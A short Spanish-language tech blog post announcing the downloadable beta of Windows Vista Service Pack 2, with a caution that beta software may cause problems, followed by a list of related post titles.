Ya es posible descargar Service Pack 2 beta para Windows Vista, aunque recuerden que es una beta y puede causar algunos problemas, aunque si tienes problemas con las redes inalámbricas o quieres las nuevas funciones es posible que instalando esta nueva actualización del sistema se solucionen los problemas.

Descargar Windows Vista Service Pack 2 beta

También puede interesarte...

• Nueva versión de Cain & Abel
• Truco para poner Flip 3D en Windows 7 Beta 1
• Microsoft Publica parche que corrige Vulnerabilidad “Critica”
• Guía de Seguridad de Windows Vista
• Ophcrack con soporte para Windows Vista
• Windows Vista Service Pack 1
• La fortuna del SP1 Update RTM bits
• Recuperar Contraseñas de Windows 7, Vista y Anteriores